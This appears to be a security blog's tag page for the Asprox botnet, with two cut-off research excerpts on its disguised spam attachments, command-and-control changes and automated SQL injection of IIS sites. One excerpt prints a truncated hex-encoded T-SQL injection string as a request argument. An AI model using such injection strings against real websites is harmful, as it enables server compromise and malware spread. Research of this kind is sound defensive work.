asprox


Asprox, a.k.a. Zortob, is an old botnet that was uncovered in 2007. It is known to spread by arriving as an attachment in spam emails that purport to be from well-known companies. The attachment itself is disguised as a legitimate document file by using icons such as those of a .doc or .pdf file.

Figure 1. Asprox malware posing as a Microsoft Word document.

This blog post will give an overview of Asprox's functionality with a focus on the changes in its communication with the command-and-control (C&C) server, including a new C&C command,...
by Long Tran  |  Jul 28, 2014  |  Filed in: Security Research
Do you remember Asprox, the botnet that used SQL injection attacks combined with results from search engines like Google to automatically infect Microsoft IIS-powered websites? We did a talk (slides) at the last Virus Bulletin about that, and for about a month now, we've been seeing some new variants in the wild. Like last December, a blind SQL injection targeting ASP pages using Transact SQL is attempted using the following chain as a request argument:

DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C41524520405420564...%20AS%20VARCHAR(4000));EXEC(@S)

Once...
by David Maciejak  |  Nov 06, 2009  |  Filed in: Security Research